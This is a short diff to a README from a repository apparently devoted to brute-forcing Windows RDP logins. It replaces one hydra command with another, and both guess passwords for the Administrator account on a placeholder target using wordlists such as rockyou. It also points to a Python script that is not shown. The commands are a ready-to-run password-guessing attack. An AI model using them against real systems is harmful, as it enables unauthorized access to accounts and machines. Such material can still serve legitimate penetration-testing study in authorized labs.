ne4tron/RDP-bruteforce-attack-on-windows/README.md

 Use hydra:

-hydra -t 8 -V -l Administrator -P shortlist.txt rdp://<target_ip>
+hydra -l Administrator -P /usr/share/wordlists/rockyou.txt rdp://<target ip>

 Or use the Python script below.